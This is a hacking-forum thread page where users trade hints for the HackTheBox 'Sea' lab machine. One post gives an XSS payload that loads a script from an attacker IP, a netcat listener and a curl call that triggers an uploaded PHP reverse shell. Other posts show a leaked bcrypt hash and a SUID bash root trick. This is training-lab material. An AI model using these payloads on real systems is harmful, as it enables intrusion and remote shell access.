[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
#61
(Aug 10, 2024, 10:21 PM)ametah Wrote: i got shell but permission denied to read user.txt at /home/amay/user.txt
I see password $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q but don't know what to do with it.
Your shell is www-data, you aren't amay yet. Find its credentials. Plaintext. Go go. Search. (also you can find in this thread).

(Aug 10, 2024, 10:22 PM)osamy7593 Wrote: lol only me after foothold did /usr/bin/bash -p and got root lol
Because people chmod u+x the /bin/bahs in public instances and leave boxes like that Sad
Reply
#62
(Aug 10, 2024, 10:21 PM)ametah Wrote: i got shell but permission denied to read user.txt at /home/amay/user.txt
I see password $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q but don't know what to do with it.

reformat the hash to match bcrypt
Reply
#63
It is showing send the below link to admin, from where
Reply
#64
people also complete the services of the dirty door
Reply
#65
If you have no idea how to reformat it just ask Chatgpt. Big Grin
Reply
#66
I'm stuck in the os injection for root, any hint plz ?
Reply
#67
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me
Reply
#68
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'
Reply
#69
hello can anyone tell me how did you ger the reverse shell
Reply
#70
Interesting daily cron:

lrwxrwxrwx 1 root root 37 Jul 29 22:16 google-chrome -> /opt/google/chrome/cron/google-chrome
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,774 2 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,500 8 hours ago
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,209 10 hours ago
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,521 Apr 29, 2026, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 414 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)